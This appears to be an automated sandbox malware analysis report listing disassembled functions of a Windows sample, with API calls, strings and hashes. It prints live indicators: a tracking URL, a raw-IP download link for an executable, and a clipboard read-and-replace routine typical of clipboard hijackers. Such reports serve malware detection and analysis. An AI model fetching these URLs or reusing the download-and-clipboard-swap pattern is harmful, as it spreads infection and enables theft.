
APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
InternetCloseHandle.WININET(00000000), ref: 00402E4B
InternetCloseHandle.WININET(00000000), ref: 00402E4E

Strings

https://post-to-me.com/track_prt.php?sub=, xrefs: 00402C57, 00402D83, 00402DF2
ShareScreen, xrefs: 00402C22
&cc=DE, xrefs: 00402DB4, 00402DBA, 00402E17

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Internet$CloseHandleOpen_wcslen
String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
API String ID: 3067768807-1501832161
Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E

Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Cnd_init.LIBCPMT ref: 004051E4
__Mtx_init.LIBCPMT ref: 0040520A
std::_Cnd_initX.LIBCPMT ref: 0040522D
__Thrd_start.LIBCPMT ref: 00405252
std::_Cnd_waitX.LIBCPMT ref: 00405272
std::_Cnd_initX.LIBCPMT ref: 0040529F

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9

Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Cnd_initX.LIBCPMT ref: 0040581C
__Cnd_signal.LIBCPMT ref: 00405828
std::_Cnd_initX.LIBCPMT ref: 0040583D
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D

Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC, 0040F1E7

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ErrorExitLastThread
String ID: F(@
API String ID: 1611280651-2698495834
Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C

Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
__dosmaperr.LIBCMT ref: 0042E170

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8

Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
__dosmaperr.LIBCMT ref: 0043479F

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98

Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664

Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC

ExitThread.KERNEL32 ref: 0042E086
CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
String ID:
API String ID: 1198197534-0
Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659

Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
PostQuitMessage.USER32(00000000), ref: 00402563

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: MessagePostProcQuitWindow
String ID:
API String ID: 3873111417-0
Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E

Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00001D1B), ref: 00401562

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

Strings

http://176.113.115.19/ScreenUpdateSync.exe, xrefs: 0040156D, 004016A6

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: _wcslen$Sleep
String ID: http://176.113.115.19/ScreenUpdateSync.exe
API String ID: 3358372957-3120454669
Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E

Function 00402960 Relevance: 3.0, APIs: 2, Instructions: 49COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040298F
__fassign.LIBCMT ref: 0040299F

Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
String ID:
API String ID: 2843524283-0
Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8

Function 02130E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,02130223,?,?), ref: 02130E19
SetErrorMode.KERNEL32(00000000,?,?,02130223,?,?), ref: 02130E1E

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 141337286ceb6be3880347a732b0624d5417ee66cd2ec71782f629bcf62dde42
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 7DD0123124512877D7013A94DC09BCD7B5CDF09B66F108021FB0DD9080C770954046E5

Function 00434186 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754

Function 0040369F Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 0040377C

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A

Function 00402823 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 323602529-0
Opcode ID: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
Opcode Fuzzy Hash: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54

Function 00403CC2 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00403CC9

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: H_prolog3_catch
String ID:
API String ID: 3886170330-0
Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94

Function 00432785 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 004327C3

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9

Function 0043CFCB Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043D00C

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4

Function 004336A7 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD

Function 0040FB0C Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004103C7

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D

Function 0043CD0A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95

Function 00540465 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 005404B6

Memory Dump Source

Source File: 00000000.00000002.4483503852.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 50dd362a1b8c8ae9f1864809fe64922e881f4706fdd5c4cbaf7c294925ff0706
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 6B112B79A40208EFDB01DF98C985E98BFF5AF08350F158094FA489B362D375EA50DF80

Non-executed Functions

Function 02131942 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 151clipboardsleepmemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0213194D
Sleep.KERNEL32(00001541), ref: 02131957

Part of subcall function 0213CE77: _strlen.LIBCMT ref: 0213CE8E

OpenClipboard.USER32(00000000), ref: 02131984
GetClipboardData.USER32(00000001), ref: 02131994
_strlen.LIBCMT ref: 021319B0
_strlen.LIBCMT ref: 021319DF
_strlen.LIBCMT ref: 02131B23
EmptyClipboard.USER32 ref: 02131B39
GlobalAlloc.KERNEL32(00000002,00000001), ref: 02131B46
GlobalUnlock.KERNEL32(00000000), ref: 02131B70
SetClipboardData.USER32(00000001,00000000), ref: 02131B79
GlobalFree.KERNEL32(00000000), ref: 02131B80
CloseClipboard.USER32 ref: 02131BA4
Sleep.KERNEL32(000002D2), ref: 02131BAF

Strings

4#E, xrefs: 0213195D
i, xrefs: 021319C0

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: 4#E$i
API String ID: 4246938166-2480119546
Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
Instruction ID: 435b5d9befa3fccfe07c80b5a521b17ec06c1562dab87c57aaff20255981c0e1
Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
Instruction Fuzzy Hash: 7E512431C40794EEE3229FA4EC45BEC7B75FF1A306F045225D805A6172EB709685CBA9

Function 02132361 Relevance: 22.7, APIs: 15, Instructions: 205nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 0213239C
GetClientRect.USER32(?,?), ref: 021323B1
GetDC.USER32(?), ref: 021323B8
CreateSolidBrush.GDI32(00646464), ref: 021323CB
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 021323EA
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0213240B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 02132416
MulDiv.KERNEL32(00000008,00000000), ref: 0213241F
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 02132443
SetBkMode.GDI32(?,00000001), ref: 021324CE
_wcslen.LIBCMT ref: 021324E6

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
String ID:
API String ID: 1529870607-0
Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
Instruction ID: 17300cb174bccf22be04555612b8afdaacd08f3c27a4c4f4cfdaca316254ac79
Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
Instruction Fuzzy Hash: A271FC72900228AFDB229F64DD85FAEB7BDEF09711F0042A5F509E6155DA70AF80CF20

Function 0043D678 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0043D7BE

Strings

1#SNAN, xrefs: 0043E9BD
1#QNAN, xrefs: 0043E9C4
1#IND, xrefs: 0043E9B6
1#INF, xrefs: 0043E9CB

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
Instruction ID: 9e6dbbf50b3e3cea2dd72b1fc58d7ba5eae27dc46f9bc3f4d00a4e89d85e9552
Opcode Fuzzy Hash: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
Instruction Fuzzy Hash: 96C25B71E096288FDB25CE29DD407EAB7B5EB48304F1551EBD80DE7280E778AE818F45

Function 0043B76E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845

Strings

ACP, xrefs: 0043B78C
OCP, xrefs: 0043B7C2

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
